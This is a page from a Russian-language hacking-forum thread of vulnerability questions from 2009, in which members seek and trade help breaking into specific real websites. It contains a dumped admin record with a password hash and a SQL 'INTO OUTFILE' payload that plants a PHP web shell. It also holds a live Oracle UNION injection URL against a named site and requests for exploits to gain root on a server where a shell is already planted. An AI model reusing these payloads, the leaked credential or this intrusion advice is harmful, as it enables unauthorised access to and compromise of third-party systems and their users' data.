Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 221 of 1207
  1. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    табличка nks_admin
    и как я понимаю нету записей?
     
    #4401 F4R, 3 Jan 2009
  2. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51

    1:root:741de08d7a4cd7c4:[email protected]
     
    #4402 aka PSIH, 3 Jan 2009
  3. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    где можно про это почитать?
    я просто такого никогда не видел)
     
    #4403 F4R, 3 Jan 2009
  4. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    про char() ?

    char(ASCII,ASCII, ... )

    перевести можно тут например... ;)
     
    #4404 aka PSIH, 3 Jan 2009
  5. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2

    ВСЁ ОТЛИЧНО ВСЁ ПОНЯЛ)_)) ОГРОМНОЕ СПС ) ОСОБЕННО ТЕБЕ!

    ещё если не сложно подкинька хороших линком на с=татейки про атаки на SQL
     
    #4405 F4R, 3 Jan 2009
  6. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    2 F4R
    http://forum.antichat.ru/threadnav43966-1-10.html
    injection.rulezz.ru
     
    #4406 Iceangel_, 3 Jan 2009
  7. jenyavlg

    jenyavlg Banned

    Joined:
    25 Aug 2007
    Messages:
    397
    Likes Received:
    19
    Reputations:
    0
    обьясните чё такое шеллы для чего они нужны и где их брать
     
    #4407 jenyavlg, 3 Jan 2009
  8. gurman94

    gurman94 New Member

    Joined:
    23 Sep 2008
    Messages:
    4
    Likes Received:
    3
    Reputations:
    0
    Всем здрасти...
    И так есть шелл на сайте (на выделенном сервере)
    так вот как его порутать? нужно полное руководство!
     
    #4408 gurman94, 3 Jan 2009
  9. Shadow_p1raT

    Shadow_p1raT Elder - Старейшина

    Joined:
    9 Mar 2008
    Messages:
    174
    Likes Received:
    93
    Reputations:
    0
    gurman94,вот отрыл на винте хорошую статейку.Сайта с которого я её копирнул уже нет.

    _http://slil.ru/26503661
     
    #4409 Shadow_p1raT, 3 Jan 2009
  10. gurman94

    gurman94 New Member

    Joined:
    23 Sep 2008
    Messages:
    4
    Likes Received:
    3
    Reputations:
    0
    Windows NT WIN-LT7NWBWEQ7D 6.0 build 6001 (то что в uname -a стоит)

    под эту версию есть сплоит? просто я на секьюритьси-лаб не нашол
    и даже не знаю где искать! в гугле тоже самое!
     
    #4410 gurman94, 3 Jan 2009
  11. sharoff

    sharoff Member

    Joined:
    5 Aug 2007
    Messages:
    25
    Likes Received:
    6
    Reputations:
    0
    Если будете искать сплойт, не перепутайте с сплойтом для ddos системы...я однажды попался, потом неделю сайт с хорошими пузомерками лежал..выделенный сервер хотел порутать называется.

    А насчет сплойтов - на секлабе не будут выкладывать полноценно рабочие, это ведь ресурс о безопасности.
     
    #4411 sharoff, 3 Jan 2009
  12. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    подскажите как быть) как изменить тип
     
    #4412 sabe, 3 Jan 2009
  13. qazer

    qazer Member

    Joined:
    26 Nov 2008
    Messages:
    78
    Likes Received:
    45
    Reputations:
    -2
    http://nismo.ru/phpmyadmin/tbl_create.php кто поможет зайти вот сюда?
     
    #4413 qazer, 3 Jan 2009
  14. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Нет скули, вообще
     
    #4414 Pashkela, 3 Jan 2009
  15. Octave_Parango

    Octave_Parango Member

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    Приветствую.
    Подскажите, можно ли залить шелл через phpMyAdmin?
    Если сморозил глупость, sorry :)
     
    #4415 Octave_Parango, 4 Jan 2009
  16. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Скуль есть.

    sabe
    Ты хочешь добится вывода? Ищи дркгой параметр, сдесь помоему глухо, похоже она слепая

    Octave_Parango
    SELECT '<?php system($c) ?>' FROM `table` INTO OUTFILE '/полный/путь/shell.php'
     
    #4416 Kakoytoxaker, 4 Jan 2009
    1 person likes this.
  17. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    Можно, при условии что у тебя есть доступ к выполнению произвольных SQL-команд и пользователь MySQL имеет привилегию FILE.
    Вот статья по теме:
    https://forum.antichat.ru/showthread.php?p=437118
    Также в некоторых версиях phpMyAdmin есть уязвимости, с помощью которых можно залить шелл.
    http://letmegooglethatforyou.com/?q=phpmyadmin%20exploit
     
    #4417 [Raz0r], 4 Jan 2009
  18. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    sabe, это Oracle. Мне приходилось иметь дело с этой субд (в плане проведения инъекций) к сожалению безрезультатно (наверно я такой тупой). На античате есть статьи по сабжу

    https://forum.antichat.ru/thread7157-%E8%ED%FA%E5%EA%F6%E8%FF+Oracle.html

    https://forum.antichat.ru/thread7158-%E8%ED%FA%E5%EA%F6%E8%FF+Oracle.html

    https://forum.antichat.ru/thread8009-%E8%ED%FA%E5%EA%F6%E8%FF+Oracle.html

    Статьи на мой взгляд отвратительные. Вообще не читабельно (имхо). Еще есть мини статья от Подкащея вроде, но там все сбито в одну кучу. Просто так сказать некоторые особенности субд.

    Желаю удачи
     
    #4418 ElteRUS, 4 Jan 2009
    1 person likes this.
  19. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    ElteRUS ты видимо не заметил отличную статью от [53x]Shadow по Oracle
    http://forum.antichat.ru/showthread.php?t=40576
     
    #4419 [Raz0r], 4 Jan 2009
    2 people like this.
  20. prescott

    prescott Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    132
    Likes Received:
    43
    Reputations:
    5
    Code:
    http://lada-auto.ru/cgi-bin/models.pl?model_id=6295171+union+select+1,null,to_char(213),null+from+sys.dual--%20&branch=tth
    Помогите с ORACLE инъекцией. Не могу подобрать тип данных для третьего столбца. В чем ошибка?
     
    #4420 prescott, 4 Jan 2009
(You must log in or sign up to post here.)
Page 221 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.